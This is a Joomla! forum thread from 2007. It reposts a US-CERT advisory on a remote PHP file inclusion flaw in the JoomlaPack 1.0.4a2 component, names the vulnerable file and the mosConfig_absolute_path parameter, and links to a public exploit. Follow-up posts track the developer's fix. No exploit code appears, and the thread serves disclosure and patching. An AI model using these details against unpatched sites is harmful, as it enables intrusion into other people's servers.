The Joomla! Forum ™





Post new topic Reply to topic  [ 5 posts ] 
Author Message
 Post subject: com_jpack 1.0.4a2
PostPosted: Wed Apr 25, 2007 5:42 am 
User avatar
Joomla! Explorer
Joomla! Explorer

Joined: Fri Aug 19, 2005 12:51 pm
Posts: 427
Location: Argentina
Original release date:  4/19/2007
Last revised: 4/19/2007
Source: US-CERT/NIST

Overview
PHP remote file inclusion vulnerability in includes/CAltInstaller.php in the JoomlaPack (com_jpack) 1.0.4a2 RE component for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.


Impact
CVSS Severity: 7.0 (High)
Range: Remotely exploitable
Authentication: Not required to exploit
Impact Type: Provides unauthorized access, Allows partial confidentiality, integrity, and availability violation


References to Advisories, Solutions, and Tools

External Source:  MILW0RM (disclaimer)

Name: 3753

Hyperlink: http://www.milw0rm.com/exploits/3753


External Source:  FRSIRT (disclaimer)

Name: ADV-2007-1429

Type:  Advisory
Hyperlink: http://www.frsirt.com/english/advisories/2007/1429


Vulnerable software and versions
JoomlaPack, JoomlaPack, 1.0.4a2 RE


Technical Details
CVSS Base Score Vector: (AV:R/AC:L/Au:NR/C:P/I:P/A:P/B:N) (legend)

Vulnerability Type: Input Validation Error


CVE Standard Vulnerability Entry:
http://cve.mitre.org/cgi-bin/cvename.cg ... -2007-2144


Common Platform Enumeration:
http://nvd.nist.gov/cpe.cfm?cvename=CVE-2007-2144

_________________
Comunidad Joomla: Maintenance, support, translation and distribution for the Joomla!. Help site online. Member of the Spanish [es_ES] Joomla Translation Team. http://comunidadjoomla.org


Top
 Profile  
 
 Post subject: Re: com_jpack 1.0.4a2
PostPosted: Thu Apr 26, 2007 8:18 am 
User avatar
Joomla! Master
Joomla! Master

Joined: Thu Aug 18, 2005 9:58 am
Posts: 10117
Location: Hillerød - Denmark
Developer notified and they will produce a new security audited release within the next days.

_________________
Ole Bang Ottosen
redCOMPONENT Community Manager http://redcomponent.com
Personligt site www.ot2sen.dk
Dansk Joomla! support websted - joomla.dk


Top
 Profile  
 
 Post subject: Re: com_jpack 1.0.4a2
PostPosted: Wed May 09, 2007 4:45 pm 
User avatar
Joomla! Guru
Joomla! Guru

Joined: Sun Nov 20, 2005 7:04 pm
Posts: 723
Location: Germany
@ot2sen

Any News on the Status of this Component?

Alex ...

_________________
| http://www.zeitfokus.de |


Top
 Profile  
 
 Post subject: Re: com_jpack 1.0.4a2
PostPosted: Sat May 12, 2007 9:56 pm 
User avatar
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Thu Apr 06, 2006 3:42 pm
Posts: 105
Location: Leeuwarden
I have just find version 1.0.4a3
Do not know if this is already with an update for this security fix

His website is at http://sledge81.freehostia.com/ with a lot good info.

This version does have more functions and looks good   :-*

_________________
Qua Patet Orbis http://www.coconutswebdesign.nl http://www.coconutshosting.nl


Last edited by schipperijn on Sat May 12, 2007 10:16 pm, edited 1 time in total.

Top
 Profile  
 
 Post subject: Re: com_jpack 1.0.4a2
PostPosted: Tue Jun 05, 2007 8:06 am 
User avatar
Joomla! Master
Joomla! Master

Joined: Thu Aug 18, 2005 9:58 am
Posts: 10117
Location: Hillerød - Denmark
alexhokamp wrote:
@ot2sen

Any News on the Status of this Component?

Developer just confirmed that a new release 1.0.4-b1 is ready for download.
Extension republished at Joomla! Extensions Directory:
http://extensions.joomla.org/component/ ... Itemid,35/

_________________
Ole Bang Ottosen
redCOMPONENT Community Manager http://redcomponent.com
Personligt site www.ot2sen.dk
Dansk Joomla! support websted - joomla.dk


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 5 posts ] 



Who is online

Users browsing this forum: No registered users and 2 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group